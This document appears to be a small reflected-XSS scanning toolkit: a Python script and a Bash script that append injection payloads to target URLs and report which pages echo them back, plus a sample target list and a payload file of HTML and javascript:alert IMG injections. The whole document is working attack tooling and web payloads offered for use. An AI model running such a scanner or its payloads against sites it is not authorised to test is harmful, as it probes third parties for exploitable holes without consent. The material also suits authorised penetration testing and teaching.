xss.py – python
import urllib
import colorama
print('----------- XSS Attack -----------')
print('--------- GET URL ATTACK --------')
urlFile = "urls.txt"
xssPayload = "../_payload/xss_payload.txt"
with open(urlFile) as urlFile:
for url in urlFile:
urlC = url.rstrip()
with open(xssPayload) as file:
for line in file:
xss = line.rstrip()
response = urllib.urlopen(urlC + xss)
data = response.read().decode('utf-8')
if xss in data:
print("- xss payload: " + urlC + xss + colorama.Fore.RED + ' page vulnerable to attack ' + colorama.Fore.RESET)
else:
print("- xss payload: " + urlC + xss + colorama.Fore.GREEN + ' not this time man ' + colorama.Fore.RESET)
xss.sh – bash
#!/usr/bin/env bash
echo '--------- XSS Attack --------'
TMP_DIR=/home/szalek/tmp
URL_FILE=urls.txt
XSS_PAYLOAD=xss_payload.txt
RED='\033[0;31m'
GREEN='\033[0;32m'
NC='\033[0m'
echo '- temp dir location: ' ${TMP_DIR}
echo '- file whit urls: ' ${PWD}/${URL_FILE}
echo '- file whit xss payload: ' ${PWD}/${XSS_PAYLOAD}
echo '-----------------------------'
TMP_FILE="${TMP_DIR}/web_xss2.html"
touch "${TMP_FILE}"
while read url;
do
while read xss;
do
xss_url_format=${xss// /'%20'}
curl -f -s -o "${TMP_FILE}" "${url}${xss_url_format}"
result=$(grep -c "${xss}" ${TMP_FILE})
if [ "$result" != 0 ]
then
echo -e ' - xss payload:' ${url}${xss_url_format} ${RED}' page vulnerable to attack'${NC}
else
echo -e ' - xss payload:' ${url}${xss_url_format} ${GREEN}' not this time man'${NC}
fi
done < ${XSS_PAYLOAD}
done < ${URL_FILE}
rm -f ${TMP_FILE}
urls.txt
http://example_page.net/search.php?s=
xss_payload.txt
xxx
<h1>xxx</h1>
<h1>xxx
<b>xxx</b>
<b>xxx
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>